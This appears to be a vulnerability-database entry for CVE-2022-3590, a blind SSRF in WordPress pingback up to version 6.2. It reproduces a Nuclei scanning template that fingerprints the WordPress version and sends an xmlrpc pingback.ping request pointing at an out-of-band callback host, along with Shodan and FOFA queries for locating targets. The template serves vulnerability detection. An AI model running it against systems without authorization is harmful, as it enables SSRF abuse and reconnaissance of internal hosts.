CVE-2022-3590: WordPress <= 6.2 - Server Side Request Forgery

日期: 2025-08-01 | 影响软件: WordPress | POC: 已公开

漏洞描述

WordPress is affected by an unauthenticated blind SSRF in the pingback feature. Because of a TOCTOU race condition between the validation checks and the HTTP request, attackers can reach internal hosts that are explicitly forbidden.

PoC代码[已公开]

id: CVE-2022-3590

info:
  name: WordPress <= 6.2 - Server Side Request Forgery
  author: riteshs4hu
  severity: medium
  description: |
    WordPress is affected by an unauthenticated blind SSRF in the pingback feature. Because of a TOCTOU race condition between the validation checks and the HTTP request, attackers can reach internal hosts that are explicitly forbidden.
  reference:
    - https://wpscan.com/vulnerability/c8814e6e-78b3-4f63-a1d3-6906a84c1f11
    - https://www.sonarsource.com/blog/wordpress-core-unauthenticated-blind-ssrf/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 5.9
    cve-id: CVE-2022-3590
    cwe-id: CWE-367
    epss-score: 0.14174
    epss-percentile: 0.94155
    cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wordpress
    product: wordpress
    shodan-query:
      - cpe:"cpe:2.3:a:wordpress:wordpress"
      - http.component:"wordpress"
    fofa-query: body="oembed" && body="wp-"
  tags: cve,cve2022,wordpress,wpscan,ssrf,oast,oob

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    host-redirects: true
    max-redirects: 2

    matchers:
      - type: regex
        part: body
        regex:
          - 'WordPress\s+(?:[1-5]\.\d+(?:\.\d+)?|6\.[0-2](?:\.\d+)?)'
        internal: true

  - raw:
      - |
        POST /xmlrpc.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml

        <?xml version="1.0"?>
        <methodCall>
          <methodName>pingback.ping</methodName>
          <params>
            <param>
              <value><string>http://{{interactsh-url}}/</string></value>
            </param>
            <param>
              <value><string>{{RootURL}}/?p=1</string></value>
            </param>
          </params>
        </methodCall>
    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains_all(body, '<methodResponse>','faultCode','<fault>')"
          - "contains(content_type, 'text/xml')"
          - "contains(interactsh_protocol, 'dns')"
        condition: and
# digest: 4a0a00473045022100f6082f7d238b20b9fe8e329edcf613b14d25a1c7296f8f147fd38dc9db37d7f50220730a454a08d5aea5fe040f71b979da123e983d76f871462bb9fc415385804c9c:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2022/CVE-2022-3590.yaml

相关漏洞推荐